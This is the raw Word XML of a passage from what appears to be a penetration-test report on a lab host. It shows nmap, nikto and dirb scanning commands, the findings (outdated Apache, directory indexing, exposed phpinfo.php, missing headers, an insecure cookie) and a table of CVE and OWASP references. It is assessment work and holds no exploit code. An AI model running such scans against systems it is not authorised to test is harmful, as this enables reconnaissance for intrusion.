                      <a:off x="0" y="0"/>
                      <a:ext cx="3175873" cy="2062127"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A529D23" w14:textId="257ED9BB" w:rsidR="00922F76" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Wireshark Filter Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB4283B" w14:textId="5E292937" w:rsidR="00DA5128" w:rsidRPr="00DA5128" w:rsidRDefault="00000000" w:rsidP="00DA5128">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="12" w:eastAsia="Times New Roman" w:hAnsi="12" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="0736B652">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
      <w:bookmarkStart w:id="13" w:name="_Toc228099275"/>
    </w:p>
    <w:p w14:paraId="39932FB4" w14:textId="75F44434" w:rsidR="00D216A7" w:rsidRDefault="001741D5" w:rsidP="00D216A7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc231851428"/>
      <w:r w:rsidRPr="001741D5">
        <w:lastRenderedPageBreak/>
        <w:t>Scanning, Enumeration, and Vulnerability Identification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidRPr="001741D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="404375D0" w14:textId="5201A3E9" w:rsidR="00CD4576" w:rsidRDefault="00D216A7" w:rsidP="0066119B">
      <w:r w:rsidRPr="00385136">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Scanning Results:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD4576" w:rsidRPr="00CD4576">
        <w:t>Nmap (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD4576" w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD4576" w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD4576" w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD4576" w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD4576" w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>sC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD4576" w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.2.7</w:t>
      </w:r>
      <w:r w:rsidR="00CD4576" w:rsidRPr="00CD4576">
        <w:t xml:space="preserve">) pinged back 999 ports filtered and found an unrecognized service on port 25 (SMTP), and a 64-bit Linux kernel (x86_64-pc-linux-gnu). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9771EB" w14:textId="0A61C5E5" w:rsidR="009173EA" w:rsidRDefault="00CD4576" w:rsidP="0066119B">
      <w:r w:rsidRPr="00CD4576">
        <w:t xml:space="preserve">Port 80 was discovered as an outdated End-of-Life (EOL) Apache 2.4.25 server running on a Debian backend with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD4576">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD4576">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidR="00CA6078" w:rsidRPr="00020919">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://10.0.2.7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00CD4576">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00CA6078">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6078" w:rsidRPr="00CA6078">
        <w:t>(Apache Software Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4576">
        <w:t>. Critical misconfigurations found include</w:t>
      </w:r>
      <w:r w:rsidR="00563392">
        <w:t xml:space="preserve"> (Refer Appendix </w:t>
      </w:r>
      <w:r w:rsidR="000C62B5">
        <w:t>F</w:t>
      </w:r>
      <w:r w:rsidR="00563392">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00563392">
        <w:t>Nikto</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00563392">
        <w:t xml:space="preserve"> Automated Vulnerability Proof)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD4576">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9D5F2D" w14:textId="0BCCCD3A" w:rsidR="002148B3" w:rsidRDefault="002148B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Clickjacking and MIME-type sniffing vulnerabilities due to missing Headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="002148B3">
        <w:t xml:space="preserve"> X-Frame-Options, X-Content-Type-Options response headers</w:t>
      </w:r>
      <w:r w:rsidR="00CA6078">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA6078" w:rsidRPr="00CA6078">
        <w:t>(OWASP Foundation, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="002148B3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755EC54F" w14:textId="2E79AD6A" w:rsidR="002148B3" w:rsidRDefault="002148B3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001070F5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Insecure PHPSESSID cookie</w:t>
      </w:r>
      <w:r w:rsidRPr="002148B3">
        <w:t xml:space="preserve"> is not marked as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002148B3">
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002148B3">
        <w:t xml:space="preserve"> and thus can be retrieved via scripts</w:t>
      </w:r>
      <w:r w:rsidR="00DD4935">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD4935" w:rsidRPr="00DD4935">
        <w:t>(The PHP Group, 2024)</w:t>
      </w:r>
      <w:r w:rsidRPr="002148B3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124AF3FB" w14:textId="5E6A791B" w:rsidR="001275DE" w:rsidRPr="004675E1" w:rsidRDefault="002148B3" w:rsidP="001275DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D216A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Information Leaks:</w:t>
      </w:r>
      <w:r w:rsidRPr="002148B3">
        <w:t xml:space="preserve"> Administrative directories and public access to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002148B3">
        <w:t>a .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002148B3">
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002148B3">
        <w:t xml:space="preserve"> manifest</w:t>
      </w:r>
      <w:r w:rsidR="00DD4935">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DD4935" w:rsidRPr="00DD4935">
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidRPr="002148B3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54755F78" w14:textId="44D9C05F" w:rsidR="009173EA" w:rsidRDefault="00D216A7" w:rsidP="005F4A4C">
      <w:r w:rsidRPr="00385136">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Enumeration:</w:t>
      </w:r>
      <w:r w:rsidRPr="00385136">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005F4A4C" w:rsidRPr="005F4A4C">
        <w:t>With DIRB web fuzzing (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F4A4C" w:rsidRPr="00D216A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005F4A4C" w:rsidRPr="00D216A7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://10.0.2.7</w:t>
      </w:r>
      <w:r w:rsidR="005F4A4C" w:rsidRPr="005F4A4C">
        <w:t>) the internal application layout was determined, and 6 active entry points were found</w:t>
      </w:r>
      <w:r w:rsidR="005E3AF0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E3AF0" w:rsidRPr="005E3AF0">
        <w:t>(Scarfone et al., 2008)</w:t>
      </w:r>
      <w:r w:rsidR="00563392">
        <w:t xml:space="preserve"> (Refer Appendix </w:t>
      </w:r>
      <w:r w:rsidR="000C62B5">
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00563392">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00973C9B">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B6E3B3" w14:textId="77777777" w:rsidR="0078371D" w:rsidRDefault="00973C9B" w:rsidP="0078371D">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r w:rsidRPr="00973C9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3724A951" wp14:editId="213FF21D">
            <wp:extent cx="4381500" cy="1651925"/>
            <wp:effectExtent l="0" t="0" r="0" b="5715"/>
            <wp:docPr id="78704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40260" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4391610" cy="1655737"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BC2968" w14:textId="1FB29A41" w:rsidR="005E3AF0" w:rsidRPr="00DD4935" w:rsidRDefault="0078371D" w:rsidP="0078371D">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00DE55B6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>: Active Entry Points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DC5BE1" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00385136" w:rsidRDefault="009173EA" w:rsidP="001275DE">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00385136">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Vulnerability Mapping:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9382" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3000"/>
        <w:gridCol w:w="1689"/>
        <w:gridCol w:w="1689"/>
        <w:gridCol w:w="3004"/>
      </w:tblGrid>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="581D5D76" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="777"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61BDA60C" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00AF0AB1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF0AB1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Finding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4397F5FF" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00AF0AB1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF0AB1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Location</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37C51719" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00AF0AB1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF0AB1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Risk</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F13DD4C" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00AF0AB1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AF0AB1">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>OWASP/CVE Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="5EA3BF6D" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="26"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79976230" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00067427" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="00067427">
              <w:t>Apache 2.4.25 outdated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F9EC1F9" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00067427" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="00067427">
              <w:t>Port 80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48845515" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00067427" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="00067427">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17C0E87D" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="00067427" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="00067427">
              <w:t>CVE-2017-7679, OWASP A06</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - </w:t>
            </w:r>
            <w:r w:rsidRPr="00025927">
              <w:t>2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="640ED2F3" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="488"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AF3A565" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Directory indexing enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="001CE3A5" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>/config/, /docs/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F55DD26" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C11DB17" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>OWASP A05</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="7A269A66" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="493"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27BFAD10" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004675E1">
              <w:t>phpinfo.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004675E1">
              <w:t xml:space="preserve"> exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F5F1128" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004675E1">
              <w:t>phpinfo.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7D221D45" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20C9D615" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>OWASP A05</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - 2021 </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="51998D08" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="488"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35FE32CB" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Missing security headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73EF5369" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>HTTP response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5FCFCA" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3004" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59B360E8" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>OWASP A05</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009173EA" w:rsidRPr="004675E1" w14:paraId="00A47E17" w14:textId="77777777" w:rsidTr="005E3AF0">
        <w:trPr>
          <w:trHeight w:val="493"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3000" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0AC44334" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t xml:space="preserve">Cookie missing </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004675E1">
              <w:t>httponly</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="004675E1">
              <w:t xml:space="preserve"> flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1689" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2652C675" w14:textId="77777777" w:rsidR="009173EA" w:rsidRPr="004675E1" w:rsidRDefault="009173EA" w:rsidP="00DA1A4D">
            <w:r w:rsidRPr="004675E1">
              <w:t>HTTP response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
